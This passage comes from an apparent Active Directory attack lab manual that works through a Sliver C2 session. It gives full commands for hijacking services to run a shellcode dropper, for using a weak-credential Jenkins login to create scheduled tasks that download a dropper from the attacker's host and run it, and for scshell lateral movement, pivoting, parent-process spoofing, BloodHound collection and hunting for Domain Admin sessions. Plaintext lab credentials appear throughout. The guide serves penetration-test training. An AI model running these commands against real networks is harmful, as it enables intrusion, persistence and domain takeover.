[server] sliver (dcorp-std_https) > remote-sc-config -t 50 "" 'AbyssWebServer' 'C:\Windows\System32\cmd.exe /c start /b C:\AD\Tools\NtDropper.exe 172.16.100.X dcorp-std_https.bin' 1 2
[*] Successfully executed remote-sc-config (coff-loader)
[*] Got output:
config_service:
hostname:
servicename: AbyssWebServer
binpath: C:\Windows\System32\cmd.exe /c start /b C:\AD\Tools\NtDropper.exe 172.16.100.X dcorp-std_https.bin
ignoremode: 1
startmode: 2
SUCCESS.

Start the AbyssWebServer service to get a high-integrity, persistent session. With start mode 2 (auto) the dropper runs again at every boot, so record the change and restore the original binary path when the engagement is over.
[server] sliver (dcorp-std_https) > remote-sc-start -t 45 "" AbyssWebServer
[*] Successfully executed remote-sc-start (coff-loader)
[*] Got output:
start_service:
hostname:
servicename: AbyssWebServer
SUCCESS.

[*] Session f16e87cb dcorp-std_https - 172.16.100.X:55852 (dcorp-stdX) - windows/amd64 - Fri, 05 Jan 2024 05:29:09 PST

Identify where studentX has local administrative access
Using LACheck
Let us now use LACheck to enumerate local admin access as dcorp\studentX. Besides its other enumeration capabilities, LACheck tests local admin access over WinRM, SMB and WMI/RPC; the protocols are selected with any combination of the winrm, smb and rpc arguments. To avoid generating logs on the domain controller, we only test computers other than the DC via /ldap:servers-exclude-dc. The run below reports all three protocols as enabled.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 120 '/mnt/c/AD/Tools/LACheck.exe' 'winrm /ldap:servers-exclude-dc /threads:10 /domain:dollarcorp.moneycorp.local'

[*] Output:
[+] Parsed Aguments:
rpc: True
smb: True
winrm: True
/bloodhound: False
/domain: dollarcorp.moneycorp.local
/ldap: servers-exclude-dc
/threads: 10
/user: studentX@dollarcorp.moneycorp.local
/verbose: False
[+] Performing LDAP query against dollarcorp.moneycorp.local for all enabled servers excluding Domain Controllers or read-only DCs...
[+] This may take some time depending on the size of the environment
[+] LDAP Search Results: 26
Status: (0.00%) 0 computers finished (+0) -- Using 22 MB RAM
[WinRM] Admin Success: DCORP-ADMINSRV.DOLLARCORP.MONEYCORP.LOCAL as studentX@dollarcorp.moneycorp.local
Status: (96.15%) 25 computers finished (+25 0.8333333)/s -- Using 27 MB RAM
Status: (96.15%) 25 computers finished (+0 0.4166667)/s -- Using 27 MB RAM
[+] Finished enumerating hosts

Command Execution using WMI
CIMplant is a C# port of WMImplant that uses CIM or WMI to query remote systems, with either supplied credentials or the current user's context. Test command execution with CIMplant's modules; here we use the basic_info module.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/CIMplant.exe' '-s dcorp-adminsrv -u studentX -p JPIzbuWHdSfq9NFr -d dollarcorp.moneycorp.local -c basic_info'

[*] Output:
_____ _____ __ __ _ _
/ ____|_ _| \/ | | | | |
| | | | | \ / |_ __ | | __ _ _ __ | |_
| | | | | |\/| | '_ \| |/ _` | '_ \| __|
| |____ _| |_| | | | |_) | | (_| | | | | |_
\_____|_____|_| |_| .__/|_|\__,_|_| |_|\__|
| |
by @Matt_Grandy_ |_| (@FortyNorthSec)

[+] Connecting to remote CIM instance using studentX...
[+] Connected

[+] Results from basic_info:

Computer Name : DCORP-ADMINSRV
Windows Directory : C:\Windows
Operating System : Microsoft Windows Server 2022 Datacenter
Version : 10.0.20348
Manufacturer : Microsoft Corporation
Number of Users : 11
Registered User : Windows User

[+] Successfully completed basic_info command

Execution time: 0 Seconds

CIMplant options used above:
-s remote host (IP or name)
-u username
-p password
-d domain
-c module to run

Use CIMplant to query the language mode of dcorp-adminsrv by using the command_exec module as follows.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/CIMplant.exe' '-s dcorp-adminsrv -u studentX -p JPIzbuWHdSfq9NFr -d dollarcorp.moneycorp.local -c command_exec --execute "$ExecutionContext.SessionState.LanguageMode"'

[*] Output:

[+] Connecting to remote CIM instance using studentX...


[+] Connected

[+] Results from command_exec:

[+] Executing command: $ExecutionContext.SessionState.LanguageMode


--------------------------------------------------------
ConstrainedLanguage

[+] Successfully completed command_exec command


Execution time: 2 Seconds

Constrained Language Mode is usually a side effect of an AppLocker policy in enforce mode, so let us enumerate the AppLocker rules from the registry on the host. In the output below, EnforcementMode : 1 on the Exe collection means executable rules are enforced rather than audited, and the visible rule allows, for Everyone (S-1-1-0), any binary signed by Microsoft.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/CIMplant.exe' '-s dcorp-adminsrv -u studentX -p JPIzbuWHdSfq9NFr -d dollarcorp.moneycorp.local -c command_exec --execute "Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse"'

[*] Output:

[+] Connecting to remote CIM instance using studentX...


[+] Connected
[+] Results from command_exec:

[+] Executing command: Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
--------------------------------------------------------
Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2
Name Property
---- --------
Appx
Dll
Exe EnforcementMode : 1
Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe

Name Property
---- --------
5a9340f3-f6a7-4892-84ac-0fffd5 Value : <FilePublisherRule Id="5a9340f3-f6a7-4892-84ac-0fffd51d9584" Name="Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" Description="" UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" ProductName="*" BinaryName="*"><BinaryVersionRange LowSection="*" HighSection="*"/></FilePublisherCondition></Conditions></FilePublisherRule>

Hive: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2
Name Property
---- --------
Msi
Script EnforcementMode :
[....snip....]

[+] Successfully completed command_exec command


Execution time: 3 Seconds
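To reason about which of our tools will run under this policy it helps to evaluate the rule the way AppLocker does. The following Python evaluator is an added example, not part of the lab manual or of CIMplant: it parses the FilePublisherRule XML recovered above (attribute spacing normalised) and decides whether a binary with a given signer, product, name and version is allowed. It models publisher rules only, and the deny rule at the top is constructed to show that a matching Deny overrides any Allow; real AppLocker policies also contain path and hash rules, which are not shown in the dump above.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Iterable, Optional, Tuple

# The Exe collection rule recovered from the SrpV2 registry dump above
# (attribute spacing normalised; it allows anything signed by Microsoft, for Everyone).
MS_PUBLISHER_RULE = (
    '<FilePublisherRule Id="5a9340f3-f6a7-4892-84ac-0fffd51d9584" '
    'Name="Signed by O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" '
    'Description="" UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions>'
    '<FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" '
    'ProductName="*" BinaryName="*"><BinaryVersionRange LowSection="*" HighSection="*"/>'
    '</FilePublisherCondition></Conditions></FilePublisherRule>'
)

# Constructed deny rule (not from the lab) showing that a matching Deny beats any Allow.
DENY_CMD_RULE = (
    '<FilePublisherRule Id="00000000-0000-0000-0000-000000000001" Name="Block cmd.exe" '
    'Description="" UserOrGroupSid="S-1-1-0" Action="Deny"><Conditions>'
    '<FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" '
    'ProductName="*" BinaryName="CMD.EXE"><BinaryVersionRange LowSection="*" HighSection="*"/>'
    '</FilePublisherCondition></Conditions></FilePublisherRule>'
)

EVERYONE = "S-1-1-0"
MS_SUBJECT = "O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US"


@dataclass
class ExeInfo:
    """What AppLocker extracts from the Authenticode signature of an executable."""
    name: str
    publisher: Optional[str]  # subject of the signing certificate, None when unsigned
    product: str
    version: str


def _norm(value: str) -> str:
    # X.500 names compare case-insensitively; also drop the spacing after commas,
    # which the registry dump above renders inconsistently.
    return ",".join(part.strip() for part in value.upper().split(","))


def _matches(pattern: str, value: str) -> bool:
    return pattern == "*" or _norm(pattern) == _norm(value)


def _ver(text: str, default: Tuple[int, ...]) -> Tuple[int, ...]:
    return default if text == "*" else tuple(int(p) for p in text.split("."))


def _conditions_hold(rule: ET.Element, exe: ExeInfo) -> bool:
    if exe.publisher is None:
        return False  # an unsigned file can never satisfy a publisher condition
    for cond in rule.iter("FilePublisherCondition"):
        if not (_matches(cond.get("PublisherName"), exe.publisher)
                and _matches(cond.get("ProductName"), exe.product)
                and _matches(cond.get("BinaryName"), exe.name)):
            continue
        rng = cond.find("BinaryVersionRange")
        if rng is None:
            return True
        low = _ver(rng.get("LowSection", "*"), (0,))
        high = _ver(rng.get("HighSection", "*"), (65535,) * 4)
        if low <= _ver(exe.version, (0,)) <= high:
            return True
    return False


def policy_allows(rules_xml: Iterable[str], exe: ExeInfo, user_sids=(EVERYONE,)) -> bool:
    """Decide whether an enforced Exe collection lets `exe` run for a user holding `user_sids`.

    AppLocker semantics: a matching Deny always wins; otherwise the file runs only if at
    least one Allow rule scoped to one of the user's SIDs matches. Only publisher rules
    are modelled here; path and hash rules would be evaluated in the same loop."""
    allowed = False
    for xml in rules_xml:
        rule = ET.fromstring(xml)
        if rule.get("UserOrGroupSid") not in user_sids or not _conditions_hold(rule, exe):
            continue
        if rule.get("Action") == "Deny":
            return False
        allowed = True
    return allowed


if __name__ == "__main__":
    cmd = ExeInfo("cmd.exe", MS_SUBJECT, "MICROSOFT WINDOWS OPERATING SYSTEM", "10.0.20348.1")
    dropper = ExeInfo("NtDropper.exe", None, "", "1.0.0.0")  # our unsigned tool
    print("cmd.exe allowed:", policy_allows([MS_PUBLISHER_RULE], cmd))
    print("NtDropper.exe allowed:", policy_allows([MS_PUBLISHER_RULE], dropper))
    print("cmd.exe with deny rule:", policy_allows([MS_PUBLISHER_RULE, DENY_CMD_RULE], cmd))
```

Under the single rule recovered from the host, Microsoft-signed binaries such as cmd.exe run for everyone while an unsigned tool like NtDropper.exe matches nothing and is blocked, which is why the later steps execute the dropper through a service rather than launching it directly as studentX.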

Command Execution using Winrm
Similar command execution is possible with the winrm BOF. Note that the BOF echoes the supplied password back in its output, which ends up in the Sliver server's logs. Perform basic command execution using winrm as follows.
[server] sliver (dcorp-std_https) > winrm -- -i dcorp-adminsrv -u studentX -p JPIzbuWHdSfq9NFr -c whoami
[*] Successfully executed winrm
[*] Got output:
[+] Arguments processed
hostname: dcorp-adminsrv
command: whoami
username: studentX
password: JPIzbuWHdSfq9NFr
dcorp\studentX

Lateral Movement using Sa-sc-enum and Scshell

Let us now create a pivot listener on dcorp-stdX to move laterally and get a Sliver session on dcorp-adminsrv. Sliver supports named-pipe (SMB) and TCP pivots for this.

Create a tcp pivot listener in the current dcorp-stdX session (dcorp-std_https) as follows.
[server] sliver (dcorp-std_https) > pivots tcp --lport 8080
[*] Started tcp pivot listener :8080 with id 1

[server] sliver (dcorp-std_https) > pivots


ID Protocol Bind Address Number Of Pivots
=== ========== ============== ==================
1 TCP :8080 0

Generate the corresponding Sliver implant service executable for the tcp listener on dcorp-stdX.
Make sure that port 8080 is allowed or firewall is disabled on dcorp-stdX.
[server] sliver (dcorp-std_https) > generate --tcp-pivot 172.16.100.X:8080 -f shellcode -e --name dcorp-adminsrv_tcp

[*] Generating new windows/amd64 implant binary


[*] Symbol obfuscation is enabled
[*] Build completed in 1m39s
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-adminsrv_tcp.bin

Setup a python3 / HFS webserver on port 80 from a new Ubuntu prompt to deliver all tools, shellcode
and payloads onto the target environment from /mnt/c/AD/Tools/Sliver.
wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/Sliver

wsluser@dcorp-studentX:~$ sudo python3 -m http.server 80


[sudo] password for wsluser: WSLToTh3Rescue!
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Back in the Sliver dcorp-stdX session, download NtDropper onto dcorp-adminsrv remotely using the winrm BOF (CIMplant's command_exec works as well).
[server] sliver (dcorp-std_https) > winrm -- -i dcorp-adminsrv -u studentX -p JPIzbuWHdSfq9NFr -t 300 -c 'curl --output C:\windows\temp\NtDropper.exe --url http://172.16.100.X/NtDropper.exe'

We can now use psexec (noisy: it uploads a service binary and registers a new service) or scshell to get a session implant on the target despite AppLocker. To do so, first find an abusable service with the sa-sc-enum BOF as follows.
[server] sliver (dcorp-std_https) > sa-sc-enum dcorp-adminsrv
[snip]
SERVICE_NAME: ssh-agent
DISPLAY_NAME: OpenSSH Authentication Agent
TYPE : 16 WIN32_OWN
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0
SERVICE_EXIT_CODE : 0
CHECKPOINT : 0
WAIT_HINT : 0
PID : 0
FLAGS : 0
TYPE : 10 WIN32_OWN
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Windows\System32\OpenSSH\ssh-agen
t.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OpenSSH Authentication Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
RESET_PERIOD (in seconds) : 0
REBOOT_MESSAGE :
COMMAND_LINE :
The service has not registered for any start or stop triggers.

The ssh-agent service is a good target: it runs as LocalSystem, is stopped and has a demand start type, so temporarily changing its binary path affects nothing that is running, and we already hold administrative privileges on the host. If the service is running, stop it first using remote-sc-stop as follows.
[server] sliver (dcorp-std_https) > remote-sc-stop -t 100 "dcorp-adminsrv" 'ssh-agent'

[*] Successfully executed remote-sc-stop (coff-loader)
[*] Got output:
stop_service:
hostname: dcorp-adminsrv
servicename: ssh-agent
Service is already stopped.
SUCCESS.

We use scshell rather than psexec. scshell calls ChangeServiceConfigA to point an existing service's binary path at our command (here cmd.exe launching NtDropper, which downloads and executes the generated shellcode), starts the service and then restores the original path. scshell itself writes nothing to disk and creates no new service, so it leaves fewer artifacts than psexec, although the configuration change and the start are still visible to anyone auditing the Service Control Manager on the target. The cmd.exe /c start /b wrapper detaches NtDropper so that it is not taken down with cmd.exe when the SCM gives up on the non-service process.
[server] sliver (dcorp-std_https) > scshell -t 80 dcorp-adminsrv ssh-agent 'C:\Windows\System32\cmd.exe /c start /b C:\Windows\Temp\NtDropper.exe 172.16.100.10 dcorp-adminsrv_tcp.bin'

[*] Successfully executed scshell (coff-loader)


[*] Got output:
Trying to connect to dcorp-adminsrv
Using current process context for authentication. (Pass the hash)
SC_HANDLE Manager 0x0000023369191030
Opening ssh-agent
SC_HANDLE Service 0x0000023369190eb0
LPQUERY_SERVICE_CONFIGA need 0x0000014c bytes
Original service binary path "C:\Windows\System32\OpenSSH\ssh-agent.exe"
Service path was changed to " C:\Windows\System32\cmd.exe /c start /b C:\Windows\Temp\NtDropper.exe 172.16.100.10 dcorp-adminsrv_tcp.bin"
Service was started
Service path was restored to "C:\Windows\System32\OpenSSH\ssh-agent.exe"

[*] Session 8f564dcc dcorp-adminsrv_tcp - 172.16.100.X:50152->dcorp-std_https-> (dcorp-adminsrv) - windows/amd64 - Tue, 16 Jan 2024 06:26:26 PST

Abuse Jenkins to get admin access on the dcorp-ci server
Using Process Injection to invoke remote shellcode
We have a Jenkins instance on dcorp-ci (http://172.16.3.11:8080) which can be enumerated using
nmap in a standard WSL Ubuntu prompt. We use the -sC and -sV flags for script and version
enumeration along with the -Pn flag to skip the host discovery phase.
wsluser@dcorp-studentX:~$ nmap 172.16.3.11 -p 8080 -sC -sV -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-09 13:35 EDT
Nmap scan report for 172.16.3.11
Host is up (0.23s latency).

PORT STATE SERVICE VERSION


8080/tcp open http Jetty 10.0.11
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.11)
|_http-title: Dashboard [Jenkins]

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.31 seconds

To execute commands on the Jenkins server without admin access we need an account that is allowed to configure builds.

In Chrome or Edge, visit http://172.16.3.11:8080. We find a Jenkins instance here.

Clicking on the people tab we find a bunch of usernames. These usernames could be used for a brute
force/password guessing attack to gain authenticated access.

Since this Jenkins instance enforces no password policy, passwords can be guessed or taken from public password lists. Guessing the username and password as builduser:builduser gives us access to the Jenkins panel.

The user builduser has the ability to configure builds and add build steps which will help us in executing
batch commands.

Select a project to configure a build for: In this case we select Project1

Next select configure to configure Project1.

Back in the dcorp-stdX Sliver session, reuse or create a new tcp pivot listener on dcorp-stdX listening on
port 8080.

[server] sliver (dcorp-std_https) > pivots tcp --lport 8080
[*] Started tcp pivot listener :8080 with id 1

[server] sliver (dcorp-std_https) > pivots


ID Protocol Bind Address Number Of Pivots
=== ========== ============== ==================
1 TCP :8080 0

Generate the corresponding Sliver implant executable for the tcp listener on dcorp-stdX. Make sure
that port 8080 is allowed or firewall is disabled on dcorp-stdX.
[server] sliver (dcorp-std_https) > generate --tcp-pivot 172.16.100.X:8080 -f shellcode -e -N dcorp-ci_tcp
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 2m17s
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-ci_tcp.bin

Setup a python3/HFS webserver on port 80 from a new Ubuntu prompt to deliver all tools, shellcode
and payloads onto the target environment from /mnt/c/AD/Tools/Sliver.
wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/Sliver

wsluser@dcorp-studentX:~$ sudo python3 -m http.server 80


[sudo] password for wsluser: WSLToTh3Rescue!
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Continuing with the Jenkins abuse, configure the project to add a build step, Execute Windows batch command, that creates scheduled tasks to download and run NtDropper with the shellcode generated above.

Begin by creating a scheduled task (DownloadNtDropper) that downloads NtDropper from our hosted webserver. Enter this in the Execute Windows batch command window and select Save.
schtasks /create /tn "DownloadNtDropper" /tr "C:\Windows\System32\cmd.exe /c start /b curl http://172.16.100.X/NtDropper.exe -o C:\Windows\Temp\NtDropper.exe" /sc ONSTART

Click on Build Now to build the project and then view the output by selecting the build --> Console
Output.

Next, click Back to project and then Configure to set up a new build that creates a second scheduled task (RunNtDropper) to execute NtDropper with our shellcode, and click Save.
schtasks /create /tn "RunNtDropper" /tr "C:\Windows\System32\cmd.exe /c start /b C:\Windows\Temp\NtDropper.exe 172.16.100.X dcorp-ci_tcp.bin" /sc ONSTART

Click on Build Now and view the Console Output as below.

We can finally run both scheduled tasks to get a pivot session on dcorp-ci.

Reconfigure another build as above to first run the DownloadNtDropper scheduled task.
schtasks /run /tn "DownloadNtDropper"

Finally run the RunNtDropper scheduled task so that NtDropper downloads and executes our dcorp-ci_tcp pivot shellcode.
schtasks /run /tn "RunNtDropper"

After a few minutes, a new tcp pivot session is spawned on dcorp-ci connecting back to the tcp pivot listener on dcorp-stdX.
[*] Session ad354cf5 DCORP-CI_TCP - 172.16.100.X:55156->dcorp-std_https-> (dcorp-ci) - windows/amd64 - Thu, 16 Jan 2024 09:56:54 EDT

[server] sliver (dcorp-std_https) > sessions

ID         Name              Transport   Remote Address                          Hostname     Username         Operating System   Last Message                    Health
========== ================= =========== ======================================= ============ ================ ================== =============================== ========
ad354cf5   DCORP-CI_TCP      pivot       172.16.100.X:55156->dcorp-std_https->   dcorp-ci     dcorp\ciadmin    windows/amd64      Thu, 16 Jan 2024 09:56:54 EDT   [ALIVE]
7ffc8893   dcorp-std_https   http(s)     172.16.100.X:55156                      dcorp-stdX   dcorp\studentX   windows/amd64      Thu, 16 Jan 2024 09:57:02 EDT   [ALIVE]

The C2 traffic now flows from the pivot back through the student VM to the server:

dcorp-ci (tcp pivot) --> dcorp-stdX (https) --> Sliver server

Learning Objective 6
Setup BloodHound and identify a machine where studentX has local administrative access.

BloodHound Enumeration
Using SharpHound.exe
BloodHound uses neo4j graph database, so that needs to be setup first.

Note: Exit BloodHound once you have stopped using it as it uses good amount of RAM. You may also like
to stop the neo4j service if you are not using BloodHound.

We need to install the neo4j service. Unzip the archive C:\AD\Tools\neo4j-community-4.1.1-windows.zip

Install and start the neo4j service as follows:

C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin>neo4j.bat install-service
Neo4j service installed
C:\AD\Tools\neo4j-community-4.4.5-windows\neo4j-community-4.4.5\bin>neo4j.bat start

Once the service gets started browse to http://localhost:7474

Enter the username: neo4j and password: neo4j. You need to enter a new password. Let's use
BloodHound as the new password.

Now, open BloodHound from C:\AD\Tools\BloodHound-win32-x64\BloodHound-win32-x64 and provide the following details:
URL: bolt://localhost:7687
Username: neo4j
Password: BloodHound

In the dcorp-stdX session, use SharpHound.exe (the C# BloodHound collector) with -c All to run every collection method and produce a BloodHound-compatible zip file.

NOTE: SharpHound's --stealth option performs a quieter, single-threaded collection that touches far fewer hosts, which is more opsec-safe.
[server] sliver (dcorp-std_https) > cd C:\\AD\\Tools\\Sliver
[*] C:\AD\Tools\Sliver

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 120 '/mnt/c/AD/Tools/SharpHound.exe' '--ldapusername studentX --ldappassword JPIzbuWHdSfq9NFr -c All'

[*] Output:
2024-01-10T04:50:49.3433951-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
[.....snip...]
2024-01-10T04:52:08.8184100-08:00|INFORMATION|Saving cache with stats: 318 ID to type mappings.
322 name to SID mappings.
2 machine sid mappings.
6 sid to domain mappings.
0 global catalog mappings.
2024-01-10T04:52:08.8343075-08:00|INFORMATION|SharpHound Enumeration Completed at 4:52 AM on 1/10/2024! Happy Graphing!

[server] sliver (dcorp-std_https) > ls *bloodhound.zip

C:\AD\Tools\Sliver (3 items, 97.3 KiB)
======================================
-rw-rw-rw- 20240110044410_BloodHound.zip 32.9 KiB Wed Jan 9 10:13:32 -0800 2024

NOTE: It is possible to exfiltrate and download the generated BloodHound compatible zip file from a
remote system using the download command in Sliver.

Import this .zip into Bloodhound via dragging and dropping.

As an alternative it is also possible to use the sharp-hound-3 alias by installing it from Sliver’s armoury
using the armory install sharp-hound-3 command.

Using LACheck
LACheck can also produce BloodHound data during its computer enumeration: the /bloodhound option switches that collection on, and the /socket option streams the generated files to a TCP listener on our host instead of leaving a zip on disk.

Execute LACheck against all computers in the dollarcorp.moneycorp.local domain with /ldap:all and /bloodhound.

NOTE: To exfiltrate the generated .json files over a TCP socket instead, add the /socket option.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/LACheck.exe' 'smb rpc winrm /bloodhound /domain:dollarcorp.moneycorp.local /user:studentX@dollarcorp.moneycorp.local /ldap:all'

[*] Output:
[+] Parsed Aguments:
rpc: True
smb: True
winrm: False
/bloodhound: True
/dc:
/domain: dollarcorp.moneycorp.local
/edr: False
/logons: False
/registry: False
/services: False
/ldap: all
/ou:
/socket:
/targets:
/threads: 25
/user: studentX@dollarcorp.moneycorp.local
/verbose: False
[+] Performing LDAP query against Global Catalog for all enabled computers with "primary" group "Domain Computers"...
[+] This may take some time depending on the size of the environment
[+] LDAP Search Results: 43
Status: (0.00%) 0 computers finished (+0) -- Using 22 MB RAM
[winrm] Admin Success: DCORP-ADMINSRV.DOLLARCORP.MONEYCORP.LOCAL as studentX@dollarcorp.moneycorp.local
Status: (97.67%) 42 computers finished (+42 1.4)/s -- Using 24 MB RAM
[+] Finished enumerating hosts
[+] Gathering Enabled Users...
Compressing zip files to zaascrqp.ccj
Password for Zip file is qu5vxg1w1np unzip files manually to upload to interface

Analysis using Web UI of BloodHound CE

We can use the data with the same Collectors with BloodHound CE. As BloodHound CE consumes high
amounts of RAM, in the lab, you only have Read-only access to a shared BloodHound CE -
https://crtpbloodhound-altsecdashboard.msappproxy.net/

Provide the following credentials to the Microsoft login page:


Username: crtpreader@altsecdashboard.onmicrosoft.com
Password: ARe@dOnlyUsertol00kAtSecurityDashboard!

This would bring you to the BloodHound CE login page. Provide the same set of credentials as above to
the BloodHound login page and you will be able to access the UI.

Always double-check the credentials in the lab portal - https://adlab.enterprisesecurity.io/

This instance of BloodHound CE already has the database populated. Feel free to play with the data!

To solve the task in the Learning Objective, proceed as follows.


In the Web UI, click on Cypher -> Click on the Folder Icon -> Pre-Built Searches -> Active Directory ->
(Scroll down) -> Shortest paths to Domain Admins

Issue with Derivative Local Admin and BloodHound 4.2.0

The latest version of BloodHound (4.2.0) does not show the Derivative Local Admin edge in the GUI. The last version where it worked is 4.0.3, present in the Tools directory as BloodHound-4.0.3_old; use it the same way as above.

Make sure to use the collector shipped with BloodHound-4.0.3_old together with the UI from BloodHound-4.0.3_old; the two are not compatible with BloodHound 4.2.0.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 120 '/mnt/c/AD/Tools/BloodHound-4.0.3_old/BloodHound-master/Collectors/SharpHound.exe' '--ldapusername studentX --ldappassword JPIzbuWHdSfq9NFr -c All'

Identify where studentX has local administrative access
To Identify where studentX has local admin access we can begin by searching for the user in the Search
for a node field.

Select the studentX node by clicking on it and then select the Derivative Local Admin Rights tab to see
that it has local admin rights on dcorp-adminsrv (press Ctrl to toggle labels).

Learning Objective 7
Identify a machine in the target domain where a Domain Admin session is available.

Compromise the machine and escalate privileges to Domain Admin

• Using access to dcorp-ci

• Using derivative local admin

Identify a Domain Admin session


Using LACheck
Access the dcorp-ci pivot session created earlier in Learning Objective 5.
[*] Session 07e043d8 dcorp-ci_tcp - 172.16.100.X:49752->dcorp-std_https-> (dcorp-ci) - windows/amd64 - Thu, 11 Jan 2024 02:21:24 PST

[server] sliver (dcorp-std_https) > sessions -i 07e043d8


[*] Active session dcorp-ci_tcp (07e043d8)

Enumerate running processes with the ps command. Use -c to print command-line arguments and -o to filter for processes running as dcorp\ciadmin.
[server] sliver (dcorp-ci_tcp) > ps -c -o 'dcorp\ciadmin'

Pid    Ppid   Owner           Arch     Executable                                                         Session
====== ====== =============== ======== ================================================================== =========
[......snip......]
2132   612    dcorp\ciadmin   x86_64   jenkins.exe                                                        0
2628   2132   dcorp\ciadmin   x86_64   C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe : "java" -Xrs -Xmx256m -Dhudson.lifecycle=hudson.lifecycle.WindowsServiceLifecycle -jar "C:\Program Files (x86)\Jenkins\jenkins.war" --httpPort=8080 --webroot="C:\Program Files (x86)\Jenkins\war"   0
2176   2628   dcorp\ciadmin   x86_64   C:\Windows\system32\conhost.exe : \??\C:\Windows\system32\conhost.exe 0x4
1364   1020   dcorp\ciadmin   x86_64   C:\Windows\System32\rdpclip.exe : rdpclip

[!] Security Product(s): Windows Defender
For fork-and-run execution with execute-assembly we spawn the sacrificial process as java.exe with Jenkins' java.exe (PID 2628) spoofed as its parent, so the new process blends in with the existing Jenkins children.

Let us use LACheck again, this time with the /logons option to list logged-on users on each host where we have admin access over WinRM. We exclude the DC to avoid creating logs on it and enumerate only servers with /ldap:servers-exclude-dc.
[server] sliver (dcorp-ci_tcp) > execute-assembly -P 2628 -p 'C:\Program Files\Common Files\Oracle\Java\javapath\java.exe' -t 180 '/mnt/c/AD/Tools/LACheck.exe' 'winrm /ldap:servers-exclude-dc /logons /threads:10 /domain:dollarcorp.moneycorp.local'

[*] Output:
[+] Parsed Aguments:
rpc: False
smb: False
winrm: True
/bloodhound: False
/dc:
/domain: dollarcorp.moneycorp.local
/edr: False
/logons: True
/registry: False
/services: False
/ldap: servers-exclude-dc
/ou:
/socket:
/targets:
/threads: 10
/user: ciadmin
/verbose: False
[+] Performing LDAP query against dollarcorp.moneycorp.local for all enabled servers excluding Domain Controllers or read-only DCs...
[+] This may take some time depending on the size of the environment
[+] LDAP Search Results: 8
Status: (0.00%) 0 computers finished (+0) -- Using 23 MB RAM
[WinRM] Admin Success: DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL as ciadmin
[session] DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL - dcorp\svcadmin 1/11/2024 4:16:15 AM (ciadmin)
[session] DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL - dcorp\ciadmin 1/11/2024 4:19:40 AM (ciadmin)
[session] DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL - DCORP-MGMT\SQLTELEMETRY 1/11/2024 4:16:15 AM (ciadmin)
[+] Finished enumerating hosts

We find that dcorp\ciadmin has local admin access on dcorp-mgmt and that a Domain Admin, dcorp\svcadmin, has a session there, alongside sessions for dcorp\ciadmin and the local SQLTELEMETRY account.
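In a larger environment LACheck returns far more Admin Success and session lines than the run above, and the interesting hosts are the ones that satisfy both conditions at once: we are local admin there, and a privileged account is logged on. The following Python session hunter is an added example (not part of the lab manual or of LACheck) that applies that intersection to LACheck's /logons output; it also covers the earlier LACheck run in this manual. The sample is the DCORP-MGMT output above plus one constructed host, DCORP-TEST, and the privileged-account list is an assumption that would normally come from BloodHound's Domain Admins membership.

```python
import re
from typing import Dict, List, Set, Tuple

# LACheck output as printed above (the DCORP-MGMT lines) plus one constructed host,
# DCORP-TEST, where we are admin but only unprivileged sessions exist.
SAMPLE = r"""
[+] LDAP Search Results: 8
Status: (0.00%) 0 computers finished (+0) -- Using 23 MB RAM
[WinRM] Admin Success: DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL as ciadmin
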